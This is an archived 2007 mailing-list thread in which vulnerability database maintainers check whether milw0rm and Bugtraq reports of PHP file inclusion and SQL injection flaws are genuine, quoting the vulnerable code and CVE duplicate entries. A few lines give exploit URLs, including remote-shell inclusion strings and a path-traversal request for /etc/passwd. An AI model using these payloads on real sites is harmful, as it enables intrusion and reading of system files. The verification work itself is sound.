From coley at mitre.org Mon Apr 2 21:17:31 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 2 Apr 2007 17:17:31 -0400 (EDT)
Subject: [VIM] [true] CWB pro 1.5 INCLUDE_PATH RFI
Message-ID: <200704022117.l32LHVB3027971@faron.mitre.org>

Ref: http://www.milw0rm.com/exploits/3628

first executable lines of the 373_cwbs1.5_demo.zip download:

cls_headline_prod.php
  include_once($INCLUDE_PATH."cls_products.php");

cls_listorders.php
  include_once($INCLUDE_PATH."cls_products.php");
  [and about 5 other includes]

cls_viewpastorders.php
  include_once($INCLUDE_PATH."cls_products.php");
  include_once($INCLUDE_PATH."cls_discounts.php");

- Steve

From coley at mitre.org Mon Apr 2 21:29:45 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 2 Apr 2007 17:29:45 -0400 (EDT)
Subject: [VIM] [true] BT-Sondage-v112 RFI
Message-ID: <200704022129.l32LTj0g028224@faron.mitre.org>

Researcher: Crackers_Child
Ref: http://www.milw0rm.com/exploits/3624

from utilitaires/gestion_sondage.php in the specified download:

//if ( !defined( "_GESTION_SONDAGE_PHP" ) )
//{
include($repertoire_visiteur.'utilitaires/affichage_formulaire.php');

- Steve

From coley at mitre.org Tue Apr 3 01:22:14 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 2 Apr 2007 21:22:14 -0400 (EDT)
Subject: [VIM] ajann's XOOPS viewcat.php issues - site-specific or not?
Message-ID: <200704030122.l331MEfD002889@faron.mitre.org>

ajann's been posting a ton of stuff to milw0rm using SQL injection in "viewcat.php" with a "cid" or similar parameter, theoretically dealing with multiple different modules. This looks like it might be a site-specific issue in http://www.xoops.pr.gov.br, anybody have any thoughts? Or is viewcat.php a required implementation for every xoops module? Searches on www.xoops.org don't seem to find products like Tutoriais (milw0rm 3621).
The module file structure documentation at:

http://dev.xoops.org/modules/phpwiki/index.php/FileStructure

doesn't mention viewcat.php, so maybe it's not a required file anyway.

On the other hand, myalbum-P (milw0rm 3632) *does* have a viewcat.php that accepts a cid parameter, although version 2.84 (http://www.xoops.org/modules/repository/singlefile.php?cid=36&lid=1196) seems to perform input validation on the cid parameter at first glance:

$cid = empty( $_GET['cid'] ) ? 0 : intval( $_GET['cid'] ) ;

*although* after this statement, there's an include of "include/assign_globals.php" (not included in the module itself), which is practically begging to have an extract() or $$varname or eval in it.

- Steve

From sullo at cirt.net Tue Apr 3 01:35:22 2007
From: sullo at cirt.net (Sullo)
Date: Mon, 02 Apr 2007 21:35:22 -0400
Subject: [VIM] Site specific: OSVDB-29901: Kinesis Interactive Cinema System (KICS) index.asp Multiple Login Field SQL Injection
Message-ID: <4611AF5A.8000901@cirt.net>

FYI--

This one is site-specific, it seems. We will be deleting our entry.

OSVDB-29901 / CVE-2006-5450

-Sullo

-------- Original Message --------

That's correct, the product is 100% web-based.

Thanks,
-alex

At 01:26 AM 30/03/2007, you wrote:
> So, there is no software that can be downloaded and installed on a
> user's site directly--if I purchase KICS, you provide me a site you
> control to manage my web site?
>
> I want to make sure I understand everything before I make updates to our
> entry, which may have ramifications for the other vulnerability
> databases as well.
>
> Thanks
> Sullo
>
>
> Alex Daniel wrote:
> > Well since it's a web based service, users need not make any changes.
> > We plugged this hole the day it was found last year.
> >
> > Cheers,
> > -alex
> >

From theall at tenablesecurity.com Tue Apr 3 02:16:48 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 02 Apr 2007 22:16:48 -0400
Subject: [VIM] ajann's XOOPS viewcat.php issues - site-specific or not?
In-Reply-To: <200704030122.l331MEfD002889@faron.mitre.org>
References: <200704030122.l331MEfD002889@faron.mitre.org>
Message-ID: <4611B910.1000307@tenablesecurity.com>

On 04/02/07 21:22, Steven M. Christey wrote:
> ajann's been posting a ton of stuff to milw0rm using SQL injection in
> "viewcat.php" with a "cid" or similar parameter, theoretically dealing
> with multiple different modules. This looks like it might be a
> site-specific issue in http://www.xoops.pr.gov.br, anybody have any
> thoughts?

I think he's been looking through the various modules for Xoops much like Xoron seems to be doing for PHP-Fusion and people did before for Mambo / Joomla and phpBB. And while I haven't looked at all of the modules, I did look at a couple of the more popular ones (Articles, Debaser, and WF-Section) and verified that the flaws do exist. [These do, though, involve different parameters and scripts than cid / viewcat.php.]

George
-- 
theall at tenablesecurity.com

From str0ke at milw0rm.com Tue Apr 3 13:47:28 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 3 Apr 2007 07:47:28 -0600
Subject: [VIM] [milw0rm] exploit 3643
Message-ID: <814b9d50704030647l16e3f9b5x47158a89740e2d93@mail.gmail.com>

Oracle 10g DBMS_AQ.ENQUEUE SQL Injection Exploit

The above exploit has been removed by the author's request. There was an issue with it working correctly outside of his testbed.

/str0ke

From gmdarkfig at gmail.com Tue Apr 3 17:31:38 2007
From: gmdarkfig at gmail.com (GM darkfig)
Date: Tue, 3 Apr 2007 19:31:38 +0200
Subject: [VIM] [false] Remote File Include In Script stat12
Message-ID:

Message: http://www.securityfocus.com/archive/1/464582/30/0/threaded
Author: RaeD at BsdMail.Com

When we search "Copyright (c) 2004 by Sam Tang" there is only one result (1) and on the server, the php is not interpreted ... we can read the source code. The title of the script is not "stat12" but "PHP i-Stats". The website (2) of the author is down.
The file inclusion will not work:

require_once('global.php');
...
define('LANGPATH', 'lang/');

[1] - http://www.tiger.edu.pl/
[2] - http://www.samphp.com

From theall at tenablesecurity.com Tue Apr 3 19:08:10 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Tue, 03 Apr 2007 15:08:10 -0400
Subject: [VIM] Bogus - [Xoops Module Virii Info <= 1.10 (index.php) Remote File Include Exploit]
Message-ID: <4612A61A.1070006@tenablesecurity.com>

Looks like milw0rm 3642 from ajann is bogus, or at least dependent on the version of Xoops -- I tested under Xoops 2.0.12, which is from June 2005, I believe.

I grabbed a copy of the module from .
modules/virii/index.php has this as its first couple of executable statements:

include ("header.php");
include("../../header.php");
include_once($xoopsConfig['root_path']."class/xoopsmodule.php");

and modules/virii/header.php has:

include("../../mainfile.php");

which includes Xoops' mainfile.php. That in turn generally includes include/common.php and class/xoopssecurity.php and then calls checkSuperglobals() from the latter. checkSuperglobals() makes sure someone isn't trying to muck with various important variables, including xoopsConfig; if so, it causes the script to die.

Now you can bypass the initial check in class/xoopssecurity.php by setting xoopsOption[nocommon] if register_globals is enabled, but then script execution proceeds to Xoops' main header.php and eventually to class/template.php, at which point it stops because SMARTY_DIR is not defined (it normally would be in include/common.php).

Apologies if this seems long-winded.
George
-- 
theall at tenablesecurity.com

From str0ke at milw0rm.com Tue Apr 3 19:41:39 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 3 Apr 2007 13:41:39 -0600
Subject: [VIM] Bogus - [Xoops Module Virii Info <= 1.10 (index.php) Remote File Include Exploit]
In-Reply-To: <4612A61A.1070006@tenablesecurity.com>
References: <4612A61A.1070006@tenablesecurity.com>
Message-ID: <814b9d50704031241n355e3486ib84b0c949687839c@mail.gmail.com>

George,

Correcto. Removing the vulnerability.

/str0ke

On 4/3/07, George A. Theall wrote:
> Looks like milw0rm 3642 from ajann is bogus, or at least dependent on
> the version of Xoops -- I tested under Xoops 2.0.12, which is from June
> 2005, I believe.
>
> I grabbed a copy of the module from
> .
> modules/virii/index.php has this as its first couple of executable
> statements:
>
> include ("header.php");
> include("../../header.php");
> include_once($xoopsConfig['root_path']."class/xoopsmodule.php");
>
> and modules/virii/header.php has:
>
> include("../../mainfile.php");
>
> which includes Xoops' mainfile.php. That in turn generally includes
> include/common.php and class/xoopssecurity.php and then calls
> checkSuperglobals() from the latter. checkSuperglobals() makes sure
> someone isn't trying to muck with various important variables, including
> xoopsConfig; if so, it causes the script to die.
>
> Now you can bypass the initial check in class/xoopssecurity.php by
> setting xoopsOption[nocommon] if register_globals is enabled, but then
> script execution proceeds to Xoops' main header.php and eventually to
> class/template.php, at which point it stops because SMARTY_DIR is not
> defined (it normally would be in include/common.php).
>
> Apologies if this seems long-winded.
>
> George
> --
> theall at tenablesecurity.com
>

From str0ke at milw0rm.com Tue Apr 3 21:03:14 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 3 Apr 2007 15:03:14 -0600
Subject: [VIM] [milw0rm] exploit 3401
Message-ID: <814b9d50704031403o685fb10dg72014d566658e4b4@mail.gmail.com>

Oracle 9i/10g DBMS_EXPORT_EXTENSION SQL Injection Exploit v2

The above exploit has been removed by the author's request. There was an issue with it working correctly outside of his testbed.

/str0ke

From theall at tenablesecurity.com Wed Apr 4 14:23:24 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 04 Apr 2007 10:23:24 -0400
Subject: [VIM] Deja Vu: phpMyNewsletter <= 0.6.12 (l) Remote File Include Exploit
Message-ID: <4613B4DC.3050102@tenablesecurity.com>

Hey str0ke, this (milw0rm 3658) looks like a repeat of an issue reported back in 2002 and covered by CVE-2002-1887 / Bugtraq ID 5886:

http://archives.neohapsis.com/archives/bugtraq/2002-10/0060.html
http://archives.neohapsis.com/archives/bugtraq/2003-02/0074.html

The first original message was for version 0.6.10. The second is for 0.6.11, which contains a brain-damaged attempt to fix the issue.

Also note that the vendor link in milw0rm 3658 is actually for the 0.6.10 code even though bd0rk talks about 0.6.12 in the advisory.

George
-- 
theall at tenablesecurity.com

From str0ke at milw0rm.com Wed Apr 4 14:30:24 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 4 Apr 2007 08:30:24 -0600
Subject: [VIM] Deja Vu: phpMyNewsletter <= 0.6.12 (l) Remote File Include Exploit
In-Reply-To: <4613B4DC.3050102@tenablesecurity.com>
References: <4613B4DC.3050102@tenablesecurity.com>
Message-ID: <814b9d50704040730g622e5eb8wd97d43df07024621@mail.gmail.com>

George,

Appreciate the info, changing the author and the script to reflect who the original finder was.

/str0ke

On 4/4/07, George A. Theall wrote:
> Hey str0ke, this (milw0rm 3658) looks like a repeat of an issue reported
> back in 2002 and covered by CVE-2002-1887 / Bugtraq ID 5886:
>
> http://archives.neohapsis.com/archives/bugtraq/2002-10/0060.html
> http://archives.neohapsis.com/archives/bugtraq/2003-02/0074.html
>
> The first original message was for version 0.6.10. The second is for
> 0.6.11, which contains a brain-damaged attempt to fix the issue.
>
> Also note that the vendor link in milw0rm 3658 is actually for the
> 0.6.10 code even though bd0rk talks about 0.6.12 in the advisory.
>
> George
> --
> theall at tenablesecurity.com
>

From str0ke at milw0rm.com Thu Apr 5 21:13:07 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 5 Apr 2007 15:13:07 -0600
Subject: [VIM] true: XOOPS Module Jobs <= 2.4 (cid) SQL Injection Exploit
Message-ID: <814b9d50704051413k1b97d24bmd3276889018cd980@mail.gmail.com>

XOOPS Module Job Listings <= 2.1 (cid) Remote BLIND SQL Injection Exploit
http://www.milw0rm.com/exploits/3672

The correct name should be Jobs and the source code below is for the latest version 2.4.

vendor url: http://www.jlmzone.com/

########### modules index.php ##############
$pa = isset( $_GET['pa'] ) ? $_GET['pa'] : '' ;
$lid = isset( $_GET['lid'] ) ? $_GET['lid'] : '' ;
$cid = isset( $_GET['cid'] ) ? $_GET['cid'] : '' ;
$debut = isset( $_GET['debut'] ) ? $_GET['debut'] : '' ;

switch($pa) {
    case "jobsview":
        $xoopsOption['template_main'] = 'jobs_category.html';
        include(XOOPS_ROOT_PATH."/header.php");
        jobsview($cid, $debut);
        break;

########### function jobsview #########
$requete = $xoopsDB->query("select cid, pid, title from ".$xoopsDB->prefix("jobs_categories")." where cid=".$cid."");
list($ccid, $pid, $title) = $xoopsDB->fetchRow($requete);
$title = $myts->makeTboxData4Show($title);
$varid[$x]=$ccid;
$varnom[$x]=$title;
##################################

/str0ke
-------------- next part --------------
A non-text attachment was scrubbed...
Name: xoopsjobexp.zip
Type: application/zip
Size: 1135 bytes
Desc: not available
Url : http://www.attrition.org/pipermail/vim/attachments/20070405/ac3dbd51/attachment.zip

From str0ke at milw0rm.com Fri Apr 6 16:01:53 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 6 Apr 2007 10:01:53 -0600
Subject: [VIM] false: phpContact Multiple Remote File Inclusion Vulnerabilities
Message-ID: <814b9d50704060901u1cc29c73o7c987f219625acb9@mail.gmail.com>

//Source: http://codewand.org/download/phpContact.zip

contact_business.php
----------------------------------------
include("include/include_preferences.inc.php");
include($include_path . "include_session.inc.php");
include($include_path . "include_mysql_connect.inc.php");

include_preferences.inc.php
----------------------------------------
$include_path = "include/"; // Where include files reside relative to index_.php file

/str0ke

---------- Forwarded message ----------
From: rko.thelegendkiller at gmail.com
Date: 6 Apr 2007 07:19:53 -0000
Subject: phpContact Multiple Remote File Inclusion Vulnerabilities
To: bugtraq at securityfocus.com

/* phpContact Multiple Remote File Inclusion Vulnerabilities */
//Author: Arham Muhammad
//Vulnerable Files: /contact_business.php, /contact_person.php
//Source: http://codewand.org/download/phpContact.zip
//Vulnerable Code: include($include_path . "include_session.inc.php");
//Expl0it: http://victim/path/contact_business.php?include_path=shell.txt?
//         http://victim/path/contact_person.php?include_path=shell.txt?
//Greets: Usman,tushy,Hackman,str0ke

From theall at tenablesecurity.com Mon Apr 9 12:16:59 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 09 Apr 2007 08:16:59 -0400
Subject: [VIM] Mostly Bogus: ScarAdControl 1.1 Remote/Local File Inclusion Vulnerabilities
Message-ID: <461A2EBB.6070002@tenablesecurity.com>

Milw0rm 3682 describes two flaws, neither of which looks valid to me, at least as BeyazKurt describes them:

- scaradcontrol.php has this near the start:

    ### du musst die '//' davor entfernen !!
    // $sac_config_dir = "/www/user234/cats/scaradcontrol/";

  If my German's any good, this says you have to uncomment the definition of $sac_config_dir (and presumably define it according to your site's layout). Between that and the include(), there's no chance for an attacker to override the definition and hence gain control of the variable. So the only way the flaw is valid is if someone just unzips the distribution file in their document root and doesn't bother doing an install.

- admin/index.php has this at lines 133 - 143:

    } elseif(md5($sac_pass)==$pass && md5($sac_user)==$user){
      if ($site=="code") {
        @code_box($id,$cat);
      } else {
        if(file_exists("$site.php")){
          include("$site.php");

  So ok, the flaw does exist but you can't exploit it unless you have credentials.

George
-- 
theall at tenablesecurity.com

From str0ke at milw0rm.com Mon Apr 9 12:29:56 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 9 Apr 2007 07:29:56 -0500
Subject: [VIM] Mostly Bogus: ScarAdControl 1.1 Remote/Local File Inclusion Vulnerabilities
In-Reply-To: <461A2EBB.6070002@tenablesecurity.com>
References: <461A2EBB.6070002@tenablesecurity.com>
Message-ID: <814b9d50704090529y5c6f80ceve1ccd35389a6b162@mail.gmail.com>

[milw0rm] 3682 << has been removed. I knew there was something fishy about it :)

/str0ke

On 4/9/07, George A. Theall wrote:
> Milw0rm 3682 describes two flaws, neither of which looks valid to me, at
> least as BeyazKurt describes them:
>
> - scaradcontrol.php has this near the start:
>
> ### du musst die '//' davor entfernen !!
>
> // $sac_config_dir = "/www/user234/cats/scaradcontrol/";
>
> If my German's any good, this says you have to uncomment the definition
> of $sac_config_dir (and presumably define it according to your site's
> layout). Between that and the include(), there's no chance for an
> attacker to override the definition and hence gain control of the
> variable. So the only way the flaw is valid is if someone just unzips
> the distribution file in their document root and doesn't bother doing an
> install.
>
> - admin/index.php has this at lines 133 - 143:
>
> } elseif(md5($sac_pass)==$pass && md5($sac_user)==$user){
>
> if ($site=="code") {
>
> @code_box($id,$cat);
>
> } else {
>
> if(file_exists("$site.php")){
>
> include("$site.php");
>
> So ok, the flaw does exist but you can't exploit it unless you have
> credentials.
>
>
> George
> --
> theall at tenablesecurity.com
>

From theall at tenablesecurity.com Mon Apr 9 15:32:55 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 09 Apr 2007 11:32:55 -0400
Subject: [VIM] ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit
Message-ID: <461A5CA7.5050608@tenablesecurity.com>

Milw0rm 3687 is for a local file include in a German news script. If I read the PoC correctly, the flaw lies with the 'sn_admin_dir' parameter of the 'scarnews.inc.php' script. The vendor seems to have just patched several files; eg,

http://www.scar4u.de/news/index.php?sn_show_news=117

yet the version remains pegged at 1.2.1. Anyone have a copy of the affected file before the changes? The version I just grabbed has this at the top:

if(!defined("SN_INCLUDE")) {
  die("ACCESS FORBIDDEN");
}

preventing it from being called directly and which I suspect is what's just been changed.
Later in the file, we have global variable registration as long as the parameter starts with "sn_":

$sn_get_post = $_REQUEST;
foreach ($sn_get_post as $sn_key => $sn_value) {
  if(ereg("^sn_",$sn_key)) { ${$sn_key} = $sn_value; }
}

and then:

if(file_exists($sn_admin_dir."admin/config.inc.php")) { ###
  include($sn_admin_dir."admin/config.inc.php"); ###
} else {

So, the issue is probably valid.

George
-- 
theall at tenablesecurity.com

From str0ke at milw0rm.com Mon Apr 9 16:00:39 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 9 Apr 2007 11:00:39 -0500
Subject: [VIM] ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit
In-Reply-To: <461A5CA7.5050608@tenablesecurity.com>
References: <461A5CA7.5050608@tenablesecurity.com>
Message-ID: <814b9d50704090900i5962ca9jb00d9465badb80bd@mail.gmail.com>

Hey George,

Wish I would have had a backup for you. The die() wasn't there before and was modified.

if(!defined("SN_INCLUDE")) {
  die("ACCESS FORBIDDEN");
}

It's still vulnerable with or without register globals but we need magic quotes = off.

scarnews.php
#######################
if(!$sn_db_handel && file_exists($sn_admin_dir."scarnews.inc.php")) {
  include($sn_admin_dir."scarnews.inc.php");

scarnews.inc.php
##################################
$sn_get_post = $_REQUEST;
foreach ($sn_get_post as $sn_key => $sn_value) {
  if(ereg("^sn_",$sn_key)) { ${$sn_key} = $sn_value; }
}
$PHP_SELF = $_SERVER['PHP_SELF'];
######################################################################
###                                                                ###
### Einbinden der Konfigurationen                                  ###
if(file_exists($sn_admin_dir."admin/config.inc.php")) { ###
  include($sn_admin_dir."admin/config.inc.php"); ###
} else {

http://site.com/scarnews.inc.php?sn_admindir=../../../etc/passwd%00

/str0ke

On 4/9/07, George A. Theall wrote:
> Milw0rm 3687 is for a local file include in a German news script. If I
> read the PoC correctly, the flaw lies with the 'sn_admin_dir' parameter
> of the 'scarnews.inc.php' script.
> The vendor seems to have just patched
> several files; eg,
>
> http://www.scar4u.de/news/index.php?sn_show_news=117
>
> yet the version remains pegged at 1.2.1. Anyone have a copy of the
> affected file before the changes? The version I just grabbed has this at
> the top:
>
> if(!defined("SN_INCLUDE")) {
> die("ACCESS FORBIDDEN");
> }
>
> preventing it from being called directly and which I suspect is what's
> just been changed. Later in the file, we have global variable
> registration as long as the parameter starts with "sn_":
>
> $sn_get_post = $_REQUEST;
> foreach ($sn_get_post as $sn_key => $sn_value) {
> if(ereg("^sn_",$sn_key)) { ${$sn_key} = $sn_value; }
> }
>
> and then:
>
> if(file_exists($sn_admin_dir."admin/config.inc.php")) { ###
> include($sn_admin_dir."admin/config.inc.php"); ###
> } else {
>
> So, the issue is probably valid.
>
>
> George
> --
> theall at tenablesecurity.com
>

From str0ke at milw0rm.com Tue Apr 10 19:44:05 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 10 Apr 2007 14:44:05 -0500
Subject: [VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
Message-ID: <814b9d50704101244w4c3718fbk3698ac67189fde2c@mail.gmail.com>

init.gallery.php
#######################3
$inc_path = dirname($include_class);
require ($inc_path."/class.gallery.php");
include($inc_path."/config.gallery.php");
....
#######################3

dirname("http://milw0rm.com") == http:

/str0ke

---------- Forwarded message ----------
From: z12xxa at gmail.com
Date: 9 Apr 2007 23:19:32 -0000
Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
To: bugtraq at securityfocus.com

vendor url: http://tomex.org/

http://[victim]/php/init.gallery.php?include_class=[SHELL]

From rkeith at securityfocus.com Tue Apr 10 19:58:13 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Tue, 10 Apr 2007 13:58:13 -0600 (MDT)
Subject: [VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
In-Reply-To: <814b9d50704101244w4c3718fbk3698ac67189fde2c@mail.gmail.com>
References: <814b9d50704101244w4c3718fbk3698ac67189fde2c@mail.gmail.com>
Message-ID:

dirname("http://milw0rm.com/test") => http://milw0rm.com

Looks valid to me.

-- 
Rob Keith
Symantec

On Tue, 10 Apr 2007, str0ke wrote:
> init.gallery.php
> #######################3
>
> $inc_path = dirname($include_class);
> require ($inc_path."/class.gallery.php");
> include($inc_path."/config.gallery.php");
> ....
> #######################3
>
> dirname("http://milw0rm.com") == http:
>
> /str0ke
>
> ---------- Forwarded message ----------
> From: z12xxa at gmail.com
> Date: 9 Apr 2007 23:19:32 -0000
> Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
> To: bugtraq at securityfocus.com
>
>
> vendor url: http://tomex.org/
>
> http://[victim]/php/init.gallery.php?include_class=[SHELL]
>

From str0ke at milw0rm.com Tue Apr 10 20:35:32 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 10 Apr 2007 15:35:32 -0500
Subject: [VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
In-Reply-To:
References: <814b9d50704101244w4c3718fbk3698ac67189fde2c@mail.gmail.com>
Message-ID: <814b9d50704101335w4f456830s1144ed162cceaad5@mail.gmail.com>

Ahh didn't think about that :)

/str0ke

On 4/10/07, rkeith at securityfocus.com wrote:
> dirname("http://milw0rm.com/test") => http://milw0rm.com
>
> Looks valid to me.
>
> --
> Rob Keith
> Symantec
>
> On Tue, 10 Apr 2007, str0ke wrote:
>
> > init.gallery.php
> > #######################3
> >
> > $inc_path = dirname($include_class);
> > require ($inc_path."/class.gallery.php");
> > include($inc_path."/config.gallery.php");
> > ....
> > #######################3
> >
> > dirname("http://milw0rm.com") == http:
> >
> > /str0ke
> >
> > ---------- Forwarded message ----------
> > From: z12xxa at gmail.com
> > Date: 9 Apr 2007 23:19:32 -0000
> > Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
> > To: bugtraq at securityfocus.com
> >
> >
> > vendor url: http://tomex.org/
> >
> > http://[victim]/php/init.gallery.php?include_class=[SHELL]
> >
>

From coley at mitre.org Wed Apr 11 00:56:43 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 10 Apr 2007 20:56:43 -0400 (EDT)
Subject: [VIM] True: MyBlog games.php RFI
Message-ID: <200704110056.l3B0uhmt001344@faron.mitre.org>

Researcher: the_Edit0r
Ref: BUGTRAQ:20070404 MyBlog: PHP and MySQL Blog/CMS software Remote File Include Vulnerabilitiy
URL:http://www.securityfocus.com/archive/1/archive/1/464716/100/0/threaded

A download of the code on April 10 yielded the following for os/games.php:

if (isset($_GET['scoreid'])) {
  echo "Top Score for this game: ";
  include($_GET['scoreid'] . "_score.txt");
  echo ", Set By:";
  include($_GET['scoreid'] . "_setby.txt");
}

The modify.php XSS was not findable in 2.2 seconds' effort but might be resultant XSS from a verbose/unquoted MySQL error message. This was not proven.

- Steve

From theall at tenablesecurity.com Wed Apr 11 13:06:24 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 11 Apr 2007 09:06:24 -0400
Subject: [VIM] Confirm: Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities
Message-ID: <461CDD50.7060309@tenablesecurity.com>

Well what do you know... I installed version 1.1.2.2 of this component in Joomla and sure enough, the exploits work as long as register_globals is enabled!
George
-- 
theall at tenablesecurity.com

From coley at mitre.org Wed Apr 11 18:55:50 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 11 Apr 2007 14:55:50 -0400 (EDT)
Subject: [VIM] Duplicate CVEs for Net-SNMP issues
Message-ID: <200704111855.l3BIto85022609@faron.mitre.org>

Normally, CVE dupes are fairly straightforward, but it took some coordination with Sun and Net-SNMP to find and address this dupe, and a lot of vuln DBs may be affected. See the analysis for CVE-2005-2177 below. It was even more painful than it sounds ;-)

- Steve

======================================================
Name: CVE-2005-2177
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2177
Acknowledged: yes advisory
Announced: 20050708
Flaw: other
Reference: BUGTRAQ:20061113 VMSA-2006-0006 - VMware ESX Server 2.5.3 Upgrade Patch 4
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/451404/100/0/threaded
Reference: BUGTRAQ:20061113 VMSA-2006-0005 - VMware ESX Server 2.5.4 Upgrade Patch 1
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/451419/100/200/threaded
Reference: BUGTRAQ:20061113 VMSA-2006-0007 - VMware ESX Server 2.1.3 Upgrade Patch 2
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/451417/100/200/threaded
Reference: BUGTRAQ:20061113 VMSA-2006-0008 - VMware ESX Server 2.0.2 Upgrade Patch 2
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/451426/100/200/threaded
Reference: MISC:http://www.net-snmp.org/about/ChangeLog.html
Reference: MLIST:[net-snmp-announce] 20050701 Multiple new Net-SNMP releases to fix a security related bug
Reference: URL:http://sourceforge.net/mailarchive/forum.php?thread_id=7659656&forum_id=12455
Reference: CONFIRM:http://support.avaya.com/elmodocs2/security/ASA-2005-225.pdf
Reference: CONFIRM:http://www.vmware.com/download/esx/esx-202-200610-patch.html
Reference: CONFIRM:http://www.vmware.com/download/esx/esx-213-200610-patch.html
Reference: CONFIRM:http://www.vmware.com/download/esx/esx-254-200610-patch.html
Reference: DEBIAN:DSA-873
Reference: URL:http://www.debian.org/security/2005/dsa-873
Reference: MANDRIVA:MDKSA-2006:025
Reference: URL:http://frontal2.mandriva.com/security/advisories?name=MDKSA-2006:025
Reference: REDHAT:RHSA-2005:373
Reference: URL:http://www.redhat.com/support/errata/RHSA-2005-373.html
Reference: REDHAT:RHSA-2005:395
Reference: URL:http://www.redhat.com/support/errata/RHSA-2005-395.html
Reference: REDHAT:RHSA-2005:720
Reference: URL:http://www.redhat.com/support/errata/RHSA-2005-720.html
Reference: SUNALERT:102725
Reference: URL:http://sunsolve.sun.com/search/document.do?assetkey=1-26-102725-1
Reference: SUSE:SUSE-SR:2005:024
Reference: URL:http://www.novell.com/linux/security/advisories/2005_24_sr.html
Reference: TRUSTIX:2005-0034
Reference: URL:http://www.trustix.org/errata/2005/0034/
Reference: UBUNTU:USN-190-1
Reference: URL:http://www.ubuntu.com/usn/usn-190-1
Reference: BID:14168
Reference: URL:http://www.securityfocus.com/bid/14168
Reference: BID:21256
Reference: URL:http://www.securityfocus.com/bid/21256
Reference: FRSIRT:ADV-2006-4502
Reference: URL:http://www.frsirt.com/english/advisories/2006/4502
Reference: FRSIRT:ADV-2006-4677
Reference: URL:http://www.frsirt.com/english/advisories/2006/4677
Reference: SECTRACK:1017273
Reference: URL:http://securitytracker.com/id?1017273
Reference: SECUNIA:15930
Reference: URL:http://secunia.com/advisories/15930
Reference: SECUNIA:18635
Reference: URL:http://secunia.com/advisories/18635
Reference: SECUNIA:17217
Reference: URL:http://secunia.com/advisories/17217
Reference: SECUNIA:17343
Reference: URL:http://secunia.com/advisories/17343
Reference: SECUNIA:17135
Reference: URL:http://secunia.com/advisories/17135
Reference: SECUNIA:17282
Reference: URL:http://secunia.com/advisories/17282
Reference: SECUNIA:16999
Reference: URL:http://secunia.com/advisories/16999
Reference: SECUNIA:17007
Reference: URL:http://secunia.com/advisories/17007
Reference: SECUNIA:22875
Reference: URL:http://secunia.com/advisories/22875
Reference: SECUNIA:23058
Reference: URL:http://secunia.com/advisories/23058

Net-SNMP 5.0.x before 5.0.10.2, 5.2.x before 5.2.1.2, and 5.1.3, when net-snmp is using stream sockets such as TCP, allows remote attackers to cause a denial of service (daemon hang and CPU consumption) via a TCP packet of length 1, which triggers an infinite loop.

Analysis:
ABSTRACTION: CVE-2006-5941 was flagged as a dupe of CVE-2005-2177 by Net-SNMP and Sun in various e-mails from November 2006 to April 2007, with the greatest clarification provided by Thomas Anders on Nov 30.

Summary:

1. the original description for CVE-2005-2177 was based on a slightly vague disclosure by Net-SNMP; later information would show that it deals with a length-1 TCP packet.

2. the NEWS file included the same text in a "Security:" item for both 5.0.10.1 and 5.0.10.2, but diff analysis had shown there were slightly different issues.

3. Sun requested CVE-2006-5941, since their information did not exactly match their understanding of CVE-2005-2177.

4. After publication of CVE-2006-5941, Net-SNMP and SuSE spotted the issue as a potential dupe.

5. Further conversation with all parties made it clear that Net-SNMP had fixed a separate issue, CVE-2005-4837, in a similar version, but had not elevated it to "vulnerability" status. CVE-2006-5941 was thus rejected.
======================================================
Name: CVE-2005-4837
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4837
Acknowledged:
Announced: 20050609
Flaw: dos-malform
Reference: CONFIRM:http://sourceforge.net/tracker/index.php?func=detail&aid=1207023&group_id=12694&atid=112694

snmp_api.c in snmpd in Net-SNMP 5.2.x before 5.2.2, 5.1.x before 5.1.3, and 5.0.x before 5.0.10.2, when running in master agentx mode, allows remote attackers to cause a denial of service (crash) by causing a particular TCP disconnect, which triggers a free of an incorrect variable, a different vulnerability than CVE-2005-2177.

======================================================
Name: CVE-2006-5941
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5941
Acknowledged:
Announced:
Flaw:

** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2005-2177. Reason: This candidate is a duplicate of CVE-2005-2177. Notes: All CVE users should reference CVE-2005-2177 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.

Analysis:
ACCURACY: see CVE-2005-2177 analysis for an explanation of how the dupe arose and was addressed.

